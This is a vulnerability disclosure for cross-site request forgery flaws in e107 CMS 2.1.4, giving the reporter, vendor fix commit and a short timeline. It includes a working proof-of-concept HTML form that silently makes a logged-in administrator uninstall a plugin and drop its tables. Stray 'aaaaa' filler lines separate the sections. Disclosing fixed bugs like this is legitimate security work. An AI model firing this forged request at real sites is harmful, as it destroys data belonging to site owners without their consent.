e107 CMS 2.1.4 Cross Site Request Forgery

e107 CMS version 2.1.4 suffers from multiple cross site request forgery vulnerabilities.


MD5 | d29a2cda6428cd71f825b5400a938379

Title:Mutiple CSRF vulnerabilities in e107 CMS 2.1.4


Author:Zhiyang Zeng


Product:

aaaaa


e107 is a powerful website content management system designed for bootstrap v3 from http://e107.org/get-started


aaaaa


Fix

aaaaa


Fixed in git source code https://github.com/e107inc/e107/commit/7a3e3d9fc7e05ce6941b9af1c14010bf2141f1a5


aaaaa


Summary


aaaa


e107 CMS version 2.1.4 is vulnerable to cross-site request forgery in plugin-installing,meta-changingand settings-changing,a malicious web page can use

forged requests to make e107 download and install a plug-in provided

by the attacker.


aaaa


Timeline


aaa


2017-03-01 report to vendor


2017-03-02 GitHub commit to fix token missing


aaa


Reproduce:


==========


I just give a uninstall any plugins POC.


vul address:http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php


POC:


<form action="http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php?uninstall.8" method="post">

<input type="text" name="delete_tables" value="1">

<input type="text" name="delete_ipool" value="1">


<input type="text" name="delete_files" value="0">

<input type="text" name="uninstall_confirm" value="Confirm uninstall">


<input type="submit" name="submit">

</form>


Description:


I try to uninstall plugin gallery which id is 8.


visiting beyond POC page, you will find gallery plugin has been uninstalled success!


===========




Best regards,

Zhiyang Zeng of Tencent security platform department




Related Posts